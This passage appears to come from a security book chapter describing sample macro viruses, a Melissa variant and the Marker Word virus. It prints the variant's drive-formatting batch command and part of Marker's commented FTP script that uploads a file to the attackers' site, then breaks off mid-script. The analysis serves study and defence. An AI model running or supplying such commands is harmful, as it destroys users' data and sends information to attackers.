Macro Virus Examples

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

This Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT , that contains the following the commands that will format hard drives:

echo y|format/q d: /v:Empty>NUL

This command is repeated for drives D thru Z.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM . This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS.


Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS . The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4 to which I have added comments:

Example 5-4. Marker virus FTP script file

o ;opens an ftp connection to hacker's ftp site user anonymous ;logs user in as anonymous pass itsme@ ;puts in password cd incoming ;changes to subdirectory called incoming on hacker's site ascii ;puts file transfer in ascii text transmission mode put hsfedrt.sys ...

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